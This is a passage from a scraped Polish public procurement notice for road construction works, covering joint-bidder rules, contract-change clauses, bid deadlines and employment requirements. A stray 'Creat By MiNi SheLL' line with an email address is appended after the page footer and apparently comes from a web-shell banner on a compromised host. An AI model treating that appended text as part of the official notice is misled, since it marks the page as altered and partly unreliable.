wspólnego ubiegania się o udzielenie zamówienia wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo<br/>reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>3). Wykonawcy wspólnie ubiegający się o zamówienie ponoszą solidarną odpowiedzialność za<br/>wykonanie umowy.<br/>4). W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia, wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na<br/>zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji<br/>których te zdolności są wymagane.<br/>5). W przypadku, o którym mowa wyżej, wykonawcy wspólnie ubiegający się o udzielenie<br/>zamówienia dołączają odpowiednio do oferty oświadczenie, z którego wynika, które roboty<br/>budowlane, dostawy lub usługi wykonają poszczególni wykonawcy.<br/>6). Dokument potwierdzający ustanowienie pełnomocnictwa powinien zawierać wskazanie<br/>postępowania o zamówienie publiczne, którego dotyczy, wykonawców ubiegających się<br/>wspólnie o udzielenie zamówienia, ustanowionego pełnomocnika oraz zakres jego umocowania.<br/>W imieniu tych wykonawców powinny działać osoby uprawnione do składania oświadczeń woli<br/>wymienione we właściwym rejestrze lub wpisie do ewidencji działalności gospodarczej lub innym<br/>właściwym rejestrze.<br/>7).Wszelka korespondencja kierowana będzie wyłącznie do podmiotu występującego jako<br/>pełnomocnik.<br/>8). W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>a). żaden z tych Wykonawców nie może podlegać wykluczeniu w okolicznościach, o których<br/>mowa w Rozdziale 12 i 13 SWZ,<br/>b). warunki udziału w postępowaniu określone w ust.2 niniejszego rozdziału winny zostać<br/>potwierdzone w sposób określony w Rozdziale 18 SWZ.<br/>7. Celem wykazania braku podstaw do wykluczenia, o których mowa w o których mowa w<br/>Rozdziale 12 i 13 SWZ oraz spełnienia warunków udziału w postępowaniu o których mowa w<br/>ust. 2 niniejszego rozdziału, Wykonawcy składają oświadczania i dokumenty określone<br/>Rozdziale 18 SWZ, w sposób i w trybie tam określonym. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zmiany umowy mogą nastąpić jedynie na podstawie okoliczności, o których mowa w art. 455<br/>ustawy Pzp, oraz okoliczności wskazanych w niniejszej umowie. 2. Jeżeli Siła Wyższa<br/>uniemożliwia lub uniemożliwi jednej ze Stron wywiązanie się z jakiegokolwiek zobowiązania<br/>objętego Umową, Strona ta zobowiązana jest niezwłocznie, nie później jednak niż w terminie<br/>dwóch dni od wystąpienia Siły Wyższej, zawiadomić drugą Stronę na piśmie o wydarzeniu lub<br/>okolicznościach stanowiących Siłę Wyższą wymieniając przy tym zobowiązania, z których nie<br/>może lub nie będzie mogła się wywiązać oraz wskazując przewidywany okres, w którym nie<br/>będzie możliwe wykonywanie Umowy. 3. W wypadku zaistnienia Siły Wyższej o charakterze<br/>długotrwałym, powodującej niewykonywanie Umowy przez okres dłuższy niż 15 dni, Strony<br/>będą prowadzić negocjacje w celu określenia dalszej realizacji lub rozwiązania Umowy. 4. W<br/>przypadku urzędowej zmiany stawki podatku VAT w trakcie obowiązywania umowy, wynikającej<br/>ze zmiany ustawy o podatku od towarów i usług oraz podatku akcyzowego Wykonawca jest<br/>uprawniony do wystąpienia do Zamawiającego z wnioskiem zawierającym uzasadnienie<br/>konieczności zmiany umowy w zakresie wynagrodzenia określonego w § 3 ust. 1 umowy w<br/>terminie zawitym 7 dni o zaistnieniu ww. sytuacji. 5. Wykonawca jest uprawniony do wystąpienia<br/>do Zamawiającego o zmianę wynagrodzenia określonego § 3 ust. 1 umowy, z powodu błędów w<br/>Dokumentacji składającej się na szczegółowy opis przedmiotu zamówienia polegających na<br/>jego niezgodności z przepisami prawa lub zasadami wiedzy technicznej, mających wpływ na<br/>należyte wykonanie lub niewykonanie umowy, jedynie w zakresie niezbędnym do dostosowania<br/>tej Dokumentacji do zasad wiedzy technicznej. Uprawnienie dotyczy tylko tych błędów, których<br/>Wykonawca przy zachowaniu należytej staranności nie mógł wykryć na etapie sporządzania<br/>Oferty. Zmiana wynagrodzenia (kosztorys różnicowy robót zaniechanych i zamiennych) zostanie<br/>ustalona w taki sposób, iż wykonawca jest obowiązany przedłożyć do akceptacji inspektora<br/>nadzoru inwestorskiego kalkulację ceny jednostkowej tych robót z uwzględnieniem cen<br/>czynników produkcji nie wyższych od średnich cen publikowanych w wydawnictwach<br/>branżowych (np. SEKOCENBUD, Orgbud, Intercenbud, itp.) dla województwa mazowieckiego, w<br/>którym roboty są wykonywane, aktualnych w miesiącu poprzedzającym miesiąc, w którym<br/>kalkulacja jest sporządzana. Wykonawca jest zobowiązany do powiadomienia Zamawiającego w<br/>terminie zawitym 7 dni o zaistnieniu ww. sytuacji pod rygorem wygaśnięcia roszczenia. 6. Strona<br/>może wystąpić z wnioskiem do drugiej Strony zawierającym propozycję zmiany sposobu<br/>wykonania przedmiotu zamówienia, jeżeli te zmiany będą korzystne dla Zamawiającego. Strona<br/>powołująca się na okoliczności o których mowa , winna powiadomić drugą stronę w terminie<br/>zawitym 7 dni o zaistnieniu ww. sytuacji i jej wpływie na dalszy przebieg robót budowlanych, pod<br/>rygorem wygaśnięcia roszczenia. 7.Zamawiający przewiduje zmianę postanowień umowy w<br/>razie zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na<br/>realizację przedmiotu zamówienia lub świadczenia jednej lub obu stron. Strona powołująca się<br/>na okoliczności o których , zobowiązana jest powiadomić drugą stronę w terminie zawitym 7 dni<br/>o zaistnieniu ww. sytuacji i jej wpływie na dalszy przebieg robót budowlanych, pod rygorem<br/>wygaśnięcia roszczenia. Zmiana przedmiotowej umowy może dotyczyć terminu wykonania<br/>zamówienia o którym mowa w § 2 ust. 1 umowy oraz wysokości wynagrodzenia o którym mowa<br/>w § 3 ust. 1 umowy. 8. W razie udzielenie przez Zamawiającego innego zamówienia istotnie<br/>wpływającego na termin realizacji niniejszej umowy Strona powołująca się na tę okoliczność<br/>zobowiązana jest powiadomić drugą stronę w terminie zawitym 7 dni o zaistnieniu ww. sytuacji i jej wpływie na dalszy przebieg robót budowlanych, pod rygorem wygaśnięcia roszczenia. 9.<br/>Szczegółowy zakres zmian umowy jest określony w projektowanych postanowieniach umowy (§<br/>20) <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-08-23 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://josephine.proebiz.com/pl/profile</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-08-23 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-09-21</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Postępowanie jest prowadzone w trybie podstawowym, na podstawie art. 275 pkt. 2 ustawy<br/>PZP, w którym Zamawiający może prowadzić negocjacje w celu ulepszenia treści ofert, które<br/>podlegają ocenie w ramach kryteriów oceny ofert, a po zakończeniu negocjacji zaprasza<br/>wykonawców do składania ofert dodatkowych. Zamawiający może dokonać wyboru<br/>najkorzystniejszej oferty bez przeprowadzenia negocjacji lub po przeprowadzeniu negocjacji,<br/>zgodnie z zasadami określonymi w Rozdziale 2 SWZ. 2. Dysponowanie zasobami innych<br/>podmiotów.<br/>1). Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, w<br/>stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego części, polegać<br/>na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej innych<br/>podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków prawnych.<br/>2). W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia wykonawcy mogą polegać na zdolnościach podmiotów udostępniających zasoby,<br/>jeśli podmioty te wykonają usługi, do realizacji których te zdolności są wymagane.<br/>3). Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby,<br/>składa wraz z ofertą, zobowiązanie podmiotu udostępniającego zasoby do oddania mu do<br/>dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny<br/>podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie<br/>dysponował niezbędnymi zasobami tych podmiotów. 4). Pozostałe informacje w tym zakresie<br/>określone są w Rozdziale 17 SWZ. 3. Wymagania w zakresie zatrudnienia na podstawie<br/>stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy Pzp : 1). Zamawiający na<br/>podstawie art. 95 ustawy PZP wymaga zatrudnienia przez Wykonawcę lub podwykonawcę na<br/>podstawie umowy o pracę osób wykonujących czynności w zakresie realizacji zamówienia, jeżeli<br/>wykonanie tych czynności polega na wykonywaniu pracy w sposób określony w art. 22 § 1<br/>ustawy z dnia 26 czerwca 1974 r. Kodeks pracy. Wymaganie powyższe dotyczy pracowników ze<br/>strony Wykonawcy, a także osoby bezpośrednio uczestniczące w wykonywaniu zamówienia,<br/>które zatrudnione będą do wykonywania czynności w zakresie wykonania warstwy ścieralnej z<br/>mieszanki mineralno - asfaltowej. Zamawiający nie wymaga zatrudnienia na podstawie umowy o<br/>pracę osób wykonujących samodzielne funkcje techniczne w budownictwie tj. kierownika<br/>budowy.<br/>2). Uprawnienia Zamawiającego w zakresie kontroli spełniania przez Wykonawcę lub<br/>podwykonawcę wymagań, o których mowa w art. 95 ustawy PZP oraz sankcje z tytułu<br/>niespełnienia tych wymagań określono w treści projektowanych postanowień umowy.</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-08-05 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com